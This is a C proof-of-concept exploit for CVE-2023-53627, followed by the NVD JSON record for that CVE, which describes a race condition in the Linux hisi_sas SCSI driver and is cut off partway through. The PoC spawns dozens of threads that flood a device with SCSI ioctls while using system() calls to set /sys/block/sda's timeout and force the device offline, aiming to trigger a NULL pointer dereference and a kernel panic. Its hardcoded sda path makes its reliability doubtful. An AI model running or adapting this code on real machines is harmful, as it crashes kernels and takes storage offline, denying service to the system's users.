CVE-2023-53627

// CVE-2023-53627 PoC - Trigger NULL pointer dereference via race condition // This PoC demonstrates how to trigger the race condition in hisi_sas driver // by generating concurrent SCSI errors while I/O operations are completing. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <fcntl.h> #include <unistd.h> #include <pthread.h> #include <sys/ioctl.h> #include <scsi/sg.h> #include <scsi/scsi.h> #define NUM_THREADS 64 #define NUM_OPERATIONS 1000 // Thread function to generate heavy SCSI I/O on a SAS device void* io_stress_thread(void* arg) { char* device = (char*)arg; int fd; fd = open(device, O_RDWR); if (fd < 0) { perror("open"); return NULL; } // Issue continuous I/O to trigger slot completion and error handling for (int i = 0; i < NUM_OPERATIONS; i++) { unsigned char sense_buffer[32]; sg_io_hdr_t io_hdr; memset(&io_hdr, 0, sizeof(sg_io_hdr_t)); memset(sense_buffer, 0, sizeof(sense_buffer)); // Send TUR (Test Unit Ready) command to generate I/O activity unsigned char cmd[6] = {0x00, 0x00, 0x00, 0x00, 0x00, 0x00}; io_hdr.interface_id = 'S'; io_hdr.cmd_len = 6; io_hdr.mx_sb_len = sizeof(sense_buffer); io_hdr.dxfer_direction = SG_DXFER_NONE; io_hdr.cmdp = cmd; io_hdr.sbp = sense_buffer; io_hdr.timeout = 5000; ioctl(fd, SG_IO, &io_hdr); } close(fd); return NULL; } // Thread function to simulate device removal/error to trigger error handler void* trigger_errors_thread(void* arg) { // Repeatedly trigger SCSI error handling path // by writing to error injection sysfs or removing/adding devices for (int i = 0; i < NUM_OPERATIONS; i++) { // Trigger SCSI error recovery by accessing non-existent LUN system("echo 1 > /sys/block/sda/device/timeout"); system("echo offline > /sys/block/sda/device/state 2>/dev/null"); usleep(100); } return NULL; } int main(int argc, char* argv[]) { pthread_t threads[NUM_THREADS]; if (argc < 2) { fprintf(stderr, "Usage: %s <scsi_device>\n", argv[0]); fprintf(stderr, "Example: %s /dev/sda\n", argv[0]); return 1; } printf("CVE-2023-53627 - hisi_sas NULL pointer dereference PoC\n"); printf("Target device: %s\n", argv[1]); printf("Starting race condition trigger...\n"); // Create threads to generate concurrent I/O and error conditions for (int i = 0; i < NUM_THREADS / 2; i++) { pthread_create(&threads[i], NULL, io_stress_thread, argv[1]); } for (int i = NUM_THREADS / 2; i < NUM_THREADS; i++) { pthread_create(&threads[i], NULL, trigger_errors_thread, NULL); } // Wait for all threads to complete for (int i = 0; i < NUM_THREADS; i++) { pthread_join(threads[i], NULL); } printf("Race condition trigger completed.\n"); printf("Check dmesg for kernel panic or NULL pointer dereference.\n"); return 0; }

{"cve": {"id": "CVE-2023-53627", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:45.690", "lastModified": "2026-02-03T22:27:40.173", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: hisi_sas: Grab sas_dev lock when traversing the members of sas_dev.list\n\nWhen freeing slots in function slot_complete_v3_hw(), it is possible that\nsas_dev.list is being traversed elsewhere, and it may trigger a NULL\npointer exception, such as follows:\n\n==>cq thread ==>scsi_eh_6\n\n ==>scsi_error_handler()\n\t\t\t\t ==>sas_eh_handle_sas_errors()\n\t\t\t\t ==>sas_scsi_find_task()\n\t\t\t\t ==>lldd_abort_task()\n==>slot_complete_v3_hw() ==>hisi_sas_abort_task()\n ==>hisi_sas_slot_task_free()\t ==>dereg_device_v3_hw()\n ==>list_del_init() \t\t ==>list_for_each_entry_safe()\n\n[ 7165.434918] sas: Enter sas_scsi_recover_host busy: 32 failed: 32\n[ 7165.434926] sas: trying to find task 0x00000000769b5ba5\n[ 7165.434927] sas: sas_scsi_find_task: aborting task 0x00000000769b5ba5\n[ 7165.434940] hisi_sas_v3_hw 0000:b4:02.0: slot complete: task(00000000769b5ba5) aborted\n[ 7165.434964] hisi_sas_v3_hw 0000:b4:02.0: slot complete: task(00000000c9f7aa07) ignored\n[ 7165.434965] hisi_sas_v3_hw 0000:b4:02.0: slot complete: task(00000000e2a1cf01) ignored\n[ 7165.434968] Unable to handle kernel NULL pointer dereference at virtual address 0000000000000000\n[ 7165.434972] hisi_sas_v3_hw 0000:b4:02.0: slot complete: task(0000000022d52d93) ignored\n[ 7165.434975] hisi_sas_v3_hw 0000:b4:02.0: slot complete: task(0000000066a7516c) ignored\n[ 7165.434976] Mem abort info:\n[ 7165.434982] ESR = 0x96000004\n[ 7165.434991] Exception class = DABT (current EL), IL = 32 bits\n[ 7165.434992] SET = 0, FnV = 0\n[ 7165.434993] EA = 0, S1PTW = 0\n[ 7165.434994] Data abort info:\n[ 7165.434994] ISV = 0, ISS = 0x00000004\n[ 7165.434995] CM = 0, WnR = 0\n[ 7165.434997] user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000f29543f2\n[ 7165.434998] [0000000000000000] pgd=0000000000000000\n[ 7165.435003] Internal error: Oops: 96000004 [#1] SMP\n[ 7165.439863] Process scsi_eh_6 (pid: 4109, stack limit = 0x00000000c43818d5)\n[ 7165.468862] pstate: 00c00009 (nzcv daif +PAN +UAO)\n[ 7165.473637] pc : dereg_device_v3_hw+0x68/0xa8 [hisi_sas_v3_hw]\n[ 7165.479443] lr : dereg_device_v3_hw+0x2c/0xa8 [hisi_sas_v3_hw]\n[ 7165.485247] sp : ffff00001d623bc0\n[ 7165.488546] x29: ffff00001d623bc0 x28: ffffa027d03b9508\n[ 7165.493835] x27: ffff80278ed50af0 x26: ffffa027dd31e0a8\n[ 7165.499123] x25: ffffa027d9b27f88 x24: ffffa027d9b209f8\n[ 7165.504411] x23: ffffa027c45b0d60 x22: ffff80278ec07c00\n[ 7165.509700] x21: 0000000000000008 x20: ffffa027d9b209f8\n[ 7165.514988] x19: ffffa027d9b27f88 x18: ffffffffffffffff\n[ 7165.520276] x17: 0000000000000000 x16: 0000000000000000\n[ 7165.525564] x15: ffff0000091d9708 x14: ffff0000093b7dc8\n[ 7165.530852] x13: ffff0000093b7a23 x12: 6e7265746e692067\n[ 7165.536140] x11: 0000000000000000 x10: 0000000000000bb0\n[ 7165.541429] x9 : ffff00001d6238f0 x8 : ffffa027d877af00\n[ 7165.546718] x7 : ffffa027d6329600 x6 : ffff7e809f58ca00\n[ 7165.552006] x5 : 0000000000001f8a x4 : 000000000000088e\n[ 7165.557295] x3 : ffffa027d9b27fa8 x2 : 0000000000000000\n[ 7165.562583] x1 : 0000000000000000 x0 : 000000003000188e\n[ 7165.567872] Call trace:\n[ 7165.570309] dereg_device_v3_hw+0x68/0xa8 [hisi_sas_v3_hw]\n[ 7165.575775] hisi_sas_abort_task+0x248/0x358 [hisi_sas_main]\n[ 7165.581415] sas_eh_handle_sas_errors+0x258/0x8e0 [libsas]\n[ 7165.586876] sas_scsi_recover_host+0x134/0x458 [libsas]\n[ 7165.592082] scsi_error_handler+0xb4/0x488\n[ 7165.596163] kthread+0x134/0x138\n[ 7165.599380] ret_from_fork+0x10/0x18\n[ 7165.602940] Code: d5033e9f b9000040 aa0103e2 eb03003f (f9400021)\n[ 7165.609004] kernel fault(0x1) notification starting on CPU 75\n[ 7165.700728] ---[ end trace fc042cbbea224efc ]---\n[ 7165.705326] Kernel panic - not syncing: Fatal exception\n\nTo fix the issue, grab sas_dev lock when traversing the members of\nsas_dev.list in dereg_device_v3_hw() and hisi_sas_release_tasks() to avoid\nconcurrency of adding and deleting member. When \n---truncated---"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR ... (truncated)